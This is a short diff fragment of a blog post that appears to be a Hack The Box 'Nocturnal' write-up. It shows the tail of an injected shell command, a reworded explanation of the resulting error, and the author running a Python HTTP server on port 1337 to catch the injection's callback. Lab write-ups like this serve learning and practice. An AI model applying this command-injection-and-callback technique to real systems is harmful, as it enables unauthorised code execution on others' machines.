henriquetorquato/henriquetorquato.github.io/all_collections/_posts/2025-05-04-hack-the-box-machine-nocturnal.md

  backups/backup_2025-05-05.zip > logfile.txt 2>&1 &
 ```

-And even though we get a `sh: 3: backups/backup_2025-05-05.zip: not found` error on the page (because the command on line 3 is wrong and will fail), we can see a hit on the API:
+And even though I got a `sh: 3: backups/backup_2025-05-05.zip: not found` error on the page (because the command on line 3 is not valid), I could see a hit on the API:

 ```
 > python3 -m http.server 1337